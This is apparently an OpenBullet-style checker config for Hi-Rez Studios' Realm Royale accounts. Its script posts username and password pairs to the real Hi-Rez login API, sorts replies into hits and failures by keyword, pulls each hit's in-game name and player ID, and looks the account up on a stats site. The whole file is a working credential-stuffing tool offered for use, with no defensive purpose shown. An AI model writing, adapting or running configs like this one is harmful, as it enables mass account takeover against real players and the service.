[SETTINGS]
{
  "Name": "Hi-Rez Realm Royal",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-16T19:28:19.2177392+02:00",
  "AdditionalInfo": "",
  "Author": "ILBASS",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.hirezstudios.com/acct/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Origin: https://my.hirezstudios.com" 
  HEADER "Referer: https://my.hirezstudios.com/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your username and password combination failed authentication. Please try again" 
  KEYCHAIN Success AND 
    KEY "user" 
    KEY "email" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<SOURCE>" DoesNotExist 

#name PARSE "<SOURCE>" LR "Realm\",\"gameId\":700,\"playerName\":\"" "\"," -> VAR "INGAME" 

#id PARSE "<SOURCE>" LR "Realm\",\"gameId\":700,\"playerName\":\"<INGAME>\",\"playerId\":" ",\"" -> VAR "INGAMEID" 

#Verfied PARSE "<SOURCE>" JSON "Verfied" -> CAP "Verfied" 

REQUEST GET "https://realmtracker.com/profile/pc/<INGAMEID>-<INGAME>/detailed" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

!PARSE "<SOURCE>" LR "" "" -> VAR "" 

